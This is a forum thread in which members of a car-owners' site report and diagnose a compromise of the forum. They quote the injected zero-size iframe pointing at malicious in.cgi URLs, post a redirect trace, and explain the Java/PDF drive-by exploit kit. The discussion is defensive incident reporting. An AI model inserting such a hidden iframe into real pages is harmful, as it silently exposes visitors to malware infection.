Whenever I visit the forums the following malicious code is blocked by my anti-virus program:

<iframe src="http://berety.pcanywhere.net/in.cgi?9"" width="0" height="0" frameborder="0"></iframe>

Not sure if this hidden frame is stats tracking you guys might be doing or if its malicious code someone inserted into your forums after hacking it.


Jan

Whatever that link is, I don't want to click it. Maybe you should wrap it in a [CODE] tag. (do we have that function?)

I can't edit my posts, just reply... lol

I can't edit my posts, just reply... lol

Checking if I can edit.

Editing.

im having problems

I see that code too

berety.pcanywhere.net seems to be the customer webspace of an ISP in the netherlands called worldstream.nl. When I go to that site it redirects me to google. Doesn't seem to be very effective malware.

You need to enter the full path with the .cgi since that's the server side code. Just going to the URL is meaningless.

yeah, chrome was blocking me from coming here.

I think I found the issue. Should be fixed now.

Only saw it once, when I went to this thread. :chuckle

I'm seeing some weird java thing popping up today too.

i just started getting this at my work computer right now
i also got this from google " visit Google's Safe Browsing diagnostic page for this site. "

Got the same warning just now in Chrome.

Luckily, I'm running Linux Mint :D

Got the same warning just now in Chrome.

Luckily, I'm running Linux Mint :D

Chrome is still giving me warnings, and I also had a java thing pop up early

Chrome showed me this.

The website at www.torontomazda3.ca contains elements from sites which appear to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
Below is a list of all the unsafe elements for the page. Click on the Diagnostic link for more information on the thread for a specific element.
Malware http://www.torontomazda3.ca/forum/images/TM3_left.gif Safe Browsing diagnostic page
Malware http://www.torontomazda3.ca/forum/images/TM3_right.gif Safe Browsing diagnostic page
Malware http://www.torontomazda3.ca/forum/images/TM3_main.jpg Safe Browsing diagnostic page
Malware http://www.torontomazda3.ca/forum/images/TM3_enter.gif Safe Browsing diagnostic page
Malware http://www.torontomazda3.ca/forum/images/TM3_bottom.gif Safe Browsing diagnostic page
Learn more about how to protect yourself from harmful software online.

:( http://i48.tinypic.com/mcvo8w.jpg

I submitted a request for google to review and remove the warning, but it takes 24 hours.

Thank goodness for Tapatalk.

I just got a warning too, first it was just a simple pop-up message box that said "this page is not valid and cannot be loaded"... upgraded my Firefox thinking I fudged something up somehow, and when I clicked on the bookmark I got another warning about the site containing malicious software... I clicked ignore.

Thanks for the update Ami.

You need to enter the full path with the .cgi since that's the server side code. Just going to the URL is meaningless.

I did.

You need to enter the full path with the .cgi since that's the server side code. Just going to the URL is meaningless.

I did.

Your site is hacked for sure. It attempted to load a Java executable when I loaded the site, which is likely something like black hole which would compromise someone machine and install a trojan. It is quite possible visitors have been getting infected since most people allow Java executables to run.

That said, right now the embeded iframe isn't loading anything.

--2013-02-23 22:37:37-- http://berety.pcanywhere.net/in.cgi?9
Resolving berety.pcanywhere.net... 217.23.11.104
Connecting to berety.pcanywhere.net|217.23.11.104|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://testd.talencea.com/wtuu.html [following]
--2013-02-23 22:37:37-- http://testd.talencea.com/wtuu.html
Resolving testd.talencea.com... 96.0.43.2
Connecting to testd.talencea.com|96.0.43.2|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: http://www.google.com/ [following]
--2013-02-23 22:37:38-- http://www.google.com/
Resolving www.google.com... 74.125.226.211, 74.125.226.209, 74.125.226.210, ...
Connecting to www.google.com|74.125.226.211|:80... connected.

I submitted a request for google to review and remove the warning, but it takes 24 hours.

Whatever you did, didn't work. Your site still is compromised.

Whatever you did, didn't work. Your site still is compromised.

100% positive it's fixed now.

Whatever the issue was... should anyone be concerned with anything on their computer? I did have Java running while browsing the forums :s and in the midst of a restart, i did a bunch of other program updates that windows prompted me were available (haven't restarted in like 2 months, lol).

Whatever the issue was... should anyone be concerned with anything on their computer? I did have Java running while browsing the forums :s and in the midst of a restart, i did a bunch of other program updates that windows prompted me were available (haven't restarted in like 2 months, lol).

Yes. The porn on your computer should be removed. :)

100% positive it's fixed now.

Did you figure out how you were compromised?

It looks like the backend of the compromise was the RedKit based on the pattern. http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html. NBC.com was compromised with this a week ago.

Whatever the issue was... should anyone be concerned with anything on their computer? I did have Java running while browsing the forums :s and in the midst of a restart, i did a bunch of other program updates that windows prompted me were available (haven't restarted in like 2 months, lol).

What version of Java are you running? If it's enabled and unpatched since last year, you're vulnerable. Reboot and run this tool, then save the output. If you want, PM me and I'll give you my e-mail address to send it to so I can take a look. http://technet.microsoft.com/en-ca/sysinternals/bb963902.aspx

Looks like it loads a malicious PDF file as well, so the same goes for Adobe Acrobat Viewer being up to date as well. Sorry for all the posts, but I can't edit my posts yet (the horror) :P

It's still here.
http://gyazo.com/d863e1557ba329c15ab27a66877422b4.png?1361687052

Yes. The porn on your computer should be removed. :)
*sigh* well at least I'll gain 1459 terabytes of free space:chuckle.

What version of Java are you running? If it's enabled and unpatched since last year, you're vulnerable. Reboot and run this tool, then save the output. If you want, PM me and I'll give you my e-mail address to send it to so I can take a look. http://technet.microsoft.com/en-ca/sysinternals/bb963902.aspx
My Java was updated this month, so I'm good on it being up to date. I have it disabled anyhow... just in case it tries to take over my porn while I'm asleep.

Looks like it loads a malicious PDF file as well, so the same goes for Adobe Acrobat Viewer being up to date as well. Sorry for all the posts, but I can't edit my posts yet (the horror) :P

I just checked my add ons page and Quicktime and Flash were both listed as vulnerable for the versions I currently had installed.

Firefox users should be able to check their add on updates here: https://www.mozilla.org/en-US/plugincheck/

Did you figure out how you were compromised?

It looks like the backend of the compromise was the RedKit based on the pattern. http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html. NBC.com was compromised with this a week ago.

Wow. I read that entire article and still have no better of an understanding. I get the point but not clearly enough.

What im getting at is how can the harm the average joe?

I believe im safe because I've been using tapatalk on my phone so I haven't been on my comp. but still curious to know how this could harm me.

Looks like it loads a malicious PDF file as well, so the same goes for Adobe Acrobat Viewer being up to date as well. Sorry for all the posts, but I can't edit my posts yet (the horror) :P

I just checked my add ons page and Quicktime and Flash were both listed as vulnerable for the versions I currently had installed.

Firefox users should be able to check their add on updates here: https://www.mozilla.org/en-US/plugincheck/

100% positive it's fixed now.

I'm 100% positive it's not :F

You've been hacked again. You really need to find the cause. Do you have http logs?

Wow. I read that entire article and still have no better of an understanding. I get the point but not clearly enough.

What im getting at is how can the harm the average joe?

I believe im safe because I've been using tapatalk on my phone so I haven't been on my comp. but still curious to know how this could harm me.

If you're running a vulnerable version of Java or Acrobat (the framework may use others, like flash), then it loads the IFrame embeded at the top of the site (it's there right now). The IFrame redirects around a bunch, until it gets to a page that loads the Java file, PDF file, and potentially a Flash file in the background (without your knowledge or intervention). I'll attempt to execute exploit code against vulnerable unpatched versions used by your browser. If successful, it will execute code on your computer (code that the attacker choses) as you (who you are logged in with) infecting your machine with whatever. Typically it's a trojan+key logger to steal your information, such as passwords, bank account info, or join your machine to a botnet to do whatever the attacher chooses through a RAT server.

If you're running a vulnerable version of Java or Acrobat (the framework may use others, like flash), then it loads the IFrame embeded at the top of the site (it's there right now). The IFrame redirects around a bunch, until it gets to a page that loads the Java file, PDF file, and potentially a Flash file in the background (without your knowledge or intervention). I'll attempt to execute exploit code against vulnerable unpatched versions used by your browser. If successful, it will execute code on your computer (code that the attacker choses) as you (who you are logged in with) infecting your machine with whatever. Typically it's a trojan+key logger to steal your information, such as passwords, bank account info, or join your machine to a botnet to do whatever the attacher chooses through a RAT server.

I'll = it'll. I really hate not being able to edit my posts. Argh.

Hours later and still compromised. I guess everyone is sleeping. If you get stumped and need assistance, let me know. I may be somewhat new around here, but I have quite a bit of experience with this stuff.

Hours later and still compromised. I guess everyone is sleeping. If you get stumped and need assistance, let me know. I may be somewhat new around here, but I have quite a bit of experience with this stuff.

Yeah, judging by your posts, you know your way around the interwebs. I haven't used the desktop version of the site for a few days now since I'm on Tapatalk, so I'm good.

Yeah Chrome still going nuts :(

Getting hacked is always such a pain.

If you're running a vulnerable version of Java or Acrobat (the framework may use others, like flash), then it loads the IFrame embeded at the top of the site (it's there right now). The IFrame redirects around a bunch, until it gets to a page that loads the Java file, PDF file, and potentially a Flash file in the background (without your knowledge or intervention). I'll attempt to execute exploit code against vulnerable unpatched versions used by your browser. If successful, it will execute code on your computer (code that the attacker choses) as you (who you are logged in with) infecting your machine with whatever. Typically it's a trojan+key logger to steal your information, such as passwords, bank account info, or join your machine to a botnet to do whatever the attacher chooses through a RAT server.

does this mean anything to a mac?

still not fixed
forum is farked

it's still trying to load some bullshit from confusedforwardthinking.asia and aeschile.org
it's a good thing I've been running noscript on my browser... it has protected me! I only noticed this site got haxxed after I noticed how pages wouldn't load right!

check this out too
https://www.google.com/safebrowsing/diagnostic?site=http://www.torontomazda3.ca/forum/&hl=en

Found the code a few hours ago. Removed the infection, and upgraded vb to close the security hole.

I still got the malware thing when I logged in 5 minutes ago..

I can't even sign in from my computer. Oh well.

It's a false positive from Google. After I upgraded to the new version of VB, google still needs to review the site. I submitted the request.

works fine for me now. didnt earlier today.

does this mean anything to a mac?

Yes, it would affect Macs just as much, if not more since people are less likely to keep things updated. Don't believe everything you hear from Steve Jobs :P

In fact, Apple themselves got owned recently: http://www.theregister.co.uk/2013/02/20/apple_java_omnishambles/

Still getting the attack page warning. Anything to be concerned about here?

Yes, it would affect Macs just as much, if not more since people are less likely to keep things updated. Don't believe everything you hear from Steve Jobs :P

In fact, Apple themselves got owned recently: http://www.theregister.co.uk/2013/02/20/apple_java_omnishambles/

Yeah I was one of those people, at one point I had over a 100 day up time on my Mac, I didn't update for a while :P Now Windows I have to restart almost every day due to some stupid issue caused by windows 8.

Still getting the attack page warning. Anything to be concerned about here?
no

no

Which vulnerability were they exploiting?

Which vulnerability were they exploiting?

Does it matter?

Still isn't working for me on Chrome, and keeps crashing on Safari...

Any idea when this will be fixed? Every time I load the site or a page I have to ignore a malware warning.

Does it matter?

Of course it matters.

Still isn't working for me on Chrome, and keeps crashing on Safari...

Any idea when this will be fixed? Every time I load the site or a page I have to ignore a malware warning.

hopefully by the AM...ask Google

The good news is I finally found an Avatar I can use for this forum :P

http://www.custodela.com/p/mal.png

Chrome is still all pissy about TM3: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.torontomazda3.ca% 2Fforum%2Fforum.php&client=googlechrome&hl=en-US

I just scanned through the html source and everything does appear to be cleaned up.

Of course it matters.

Why? It doesn't really matter. Make sure VB is up to date and you should be okay.

I'm getting that same Malware warning on my home and work computer. I just got 2 mins ago trying to log on

I'm getting that same Malware warning on my home and work computer. I just got 2 mins ago trying to log on
yes, I am still trying to get Google to review the site again. Until they do, the warning will come up. You can ignore it.

Why? It doesn't really matter. Make sure VB is up to date and you should be okay.

It matters because depending on the vulnerability exploited, their could be down stream impacts. For example, if the vulnerability was related to a single admin account, or a session hijacking/spoofing vulnerability (e.g. XSS or one of the many authentication vulnerabilities known to VBB), then the downstream impact is likely minor since everyone was logged out after the upgrade, with the exception of people who ran the code they were giving out.

If the vulnerability was local file execution (server) or an SQL injection related, then that's entirely different since the attacker could have obtained a dump of users, e-mail addresses, and password hashes (which are usually fairly trivial to break with rainbow tables). If this was the case, then you should force your users to change their passwords at the next login, or at least notify them that the passwords may have been obtained since statistically 92% of people reuse passwords across the Internet, and may even have the same password to login to the e-mail account listed in your database.

So yeah, it matters.

It was spoof related, combined with a YUI exploit . The database was not compromised. Hack was plugin based.

yes, I am still trying to get Google to review the site again. Until they do, the warning will come up. You can ignore it.

yes you can ignore it but I can't post on the site unless I remove my entire firewall.

google still provides warning. Yesterday, AVG stated I was infected when visiting the site, but was able to remove threat. Good luck.

Re; forum updates... I think we're getting ahead of ourselves... the default time zone on the page seems to be set to Atlantic Standard time. Before I was logged in, I noticed there were posts from the future, lol. As soon as I log in, it shows the correct time.
Thought it might have been my PC, but my phone shows the same result.

It was spoof related, combined with a YUI exploit . The database was not compromised. Hack was plugin based.

Ahh, found it. That makes sense then, thanks.

yes you can ignore it but I can't post on the site unless I remove my entire firewall.

Any kind of relevant 'firewall' software has the ability to either disable HTTP scanning/URL Checks, or gives you the ability to exclude specific host names. If you really had to uninstall everything to exclude one site, then you're using the wrong software.

just got the malicious code warning from chrome.

10:50am on monday ET.

Any kind of relevant 'firewall' software has the ability to either disable HTTP scanning/URL Checks, or gives you the ability to exclude specific host names. If you really had to uninstall everything to exclude one site, then you're using the wrong software.

i didn't uninstall anything, I had to disable (protect against fraudulent websites) that to me is removing the firewall lol. I still should not have to disable my firewall to go on this site.

i didn't uninstall anything, I had to disable (protect against fraudulent websites) that to me is removing the firewall lol. I still should not have to disable my firewall to go on this site.

Then don't go on the site until the warning is removed. The site was compromised and Google legitimately added it to the shit list. It will eventually get removed, and you can catch up when that happens. As I said, most software has an exclusion list so you don't have to disable it across the board.

Google chrome has totally blocked the site, stuck browsing on my blackberry now :(

Google chrome has totally blocked the site, stuck browsing on my blackberry now :(

You need to go into advanced, and then ignore warning.

You need to go into advanced, and then ignore warning.

Thanks Ami, will do! I'm not very computer savy lol

Seems to be working now. I'm on Chrome.

Yup it's working now!

Hmm, thought it was fixed but I get the message when I go directly to the forum url, when I enter via the home page I don't get the warning.
I'm on chrome.

This should now be completely resolved. If anyone still receives warnings, please let me know.

Currently get this from my iPhone.

http://img.tapatalk.com/d/13/02/26/7emu3eny.jpg

It's fine now :D

Currently get this from my iPhone.

http://img.tapatalk.com/d/13/02/26/7emu3eny.jpg

Try closing your browser, and re-opening. May need to restart phone.

Maybe due to all the high amount of useless posts and threads recently it gave our computers and web browsers cancer.

Still getting it in Chrome at work and at home...

http://oi52.tinypic.com/167a4wy.jpg

yeah, I just started getting it in Chrome, but not FireFox. I did a search of the site, across all clearinghouses and it should not be blacklisted.

Kaspersky JUST blocked something from this site and I still got the warning from google chrome.
in.cgi?9 Blocked: http://creative.pcanywhere.net/in.cgi?9 (analysis using the database of malicious URLs) 2/26/2013 4:06:09 PM http://creative.pcanywhere.net/

Its back...


<iframe src="http://creative.pcanywhere.net/in.cgi?9"" width="0" height="0" frameborder="0"></iframe>

Whoever is the webmaster of the site might want to check your CHMOD permission on the file system. You might be allowing too much access for users and a script is editing your files. I'd highly recommend not running higher than 0755 for folder permissions.

Its back...


<iframe src="http://creative.pcanywhere.net/in.cgi?9"" width="0" height="0" frameborder="0"></iframe>

Whoever is the webmaster of the site might want to check your CHMOD permission on the file system. You might be allowing too much access for users and a script is editing your files. I'd highly recommend not running higher than 0755 for folder permissions.

Webmaster is me, and I am working on the issues again.

It just made me accept the risk like 6 times in a row, way more than anytime before...and I got this for the first time

http://oi52.tinypic.com/96gbd1.jpg

I believe I found the file again and removed it.

Its telling me to download java to view the site

download it and report back with virus plz

I believe I found the file again and removed it.

Nope, you're hacked again XD

if none of you are running noscript with firefox, DO IT NOW
I disabled all scripting for TM3 for now.... it has protected me from this nastiness

I'm inclined to think that the entire server is being pwned... if it's running an old version of whatever OS, it needs to be updated/patched to remove all known exploits

S.F.W: I offered before, but again if you get stumped, I'm willing to assist.

Ha, I'll pass. Chrome still doesnt show the site and it's messed on I.E.

S.F.W: I offered before, but again if you get stumped, I'm willing to assist.

This guy should be helping.
he seems to know whats going on.

This guy should be helping.
he seems to know whats going on.

Or maybe he's the one who's hacking.....................

Or maybe he's the one who's hacking.....................

http://www.custodela.com/p/smiles/emot-tinfoil.gif

This guy should be helping.
he seems to know whats going on.


http://www.custodela.com/p/smiles/emot-tinfoil.gif


I have pm'd Mangtoos, I also have -cj- helping , and a third party company that specializes in forum malware security.

Is it safe to use tapatalk or will my phone get infected? Im avoiding TM3 on my pc until everything is resolved and confirmed to be free of issues by everyone

well would you look at that. its finally happened to me. but this is only when im going through google under "web". everything else is fine though

http://imageshack.us/a/img198/426/picture1in.png

http://imageshack.us/a/img803/6898/picture2bk.png

site has been verified as clean again. google warning should go away in about ~4 hours. Myself and a few others are trying to ensure the security issue is resolved.

Is it safe to use tapatalk or will my phone get infected? Im avoiding TM3 on my pc until everything is resolved and confirmed to be free of issues by everyone

Windows Defender in windows 8 hasn't detected anything, so either it sucks or nothing is actually getting through.

http://www.custodela.com/p/marshall.jpg

I'm on it!

^ I like this guy.

holy sh!t, I am away for a week and all hell breaks loose.

well at least it wasn't all that war propaganda like last time..